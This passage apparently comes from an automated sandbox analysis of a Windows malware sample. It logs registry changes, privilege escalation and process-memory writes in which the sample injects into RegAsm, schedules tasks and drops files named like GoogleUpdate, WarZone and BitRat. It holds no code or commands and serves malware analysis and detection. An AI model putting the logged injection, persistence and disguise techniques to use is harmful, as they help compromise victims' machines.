e000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000fff100008000000000000000000000000000000000000000000000000001000080070000e0070000c00f0000ce3f0000ffff0000ffff0000ffff0000ffff0000ffff0000ffff0000f0000000000000000000000000000000000100000003000080070000c0070000c0070000fc0f0000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff00000000000000000000000000000000000000000000000001000000080000001800000007000000d4000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "140" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "9852" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "9852" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "4051" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "4051" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{54877B69-094E-46DB-BBD6-85AB58A41C20} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "173" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "173" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "173" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "4051" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133065036373276371" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "888" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "9852" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5036 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\cmd.exe
PID 5036 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\cmd.exe
PID 5036 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\cmd.exe
PID 808 wrote to memory of 3536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 808 wrote to memory of 3536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 808 wrote to memory of 3536 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5036 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2416 wrote to memory of 3860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 3860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 3860 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 3748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 2416 wrote to memory of 3748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 2416 wrote to memory of 3748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 2416 wrote to memory of 2908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 2416 wrote to memory of 2908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 2416 wrote to memory of 2908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 2416 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 2416 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 2416 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 2416 wrote to memory of 3772 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 2416 wrote to memory of 3772 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 2416 wrote to memory of 3772 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 2416 wrote to memory of 4432 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 2416 wrote to memory of 4432 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 4432 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4432 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3980 wrote to memory of 4524 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3980 wrote to memory of 4524 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\explorer.exe
PID 4432 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\explorer.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
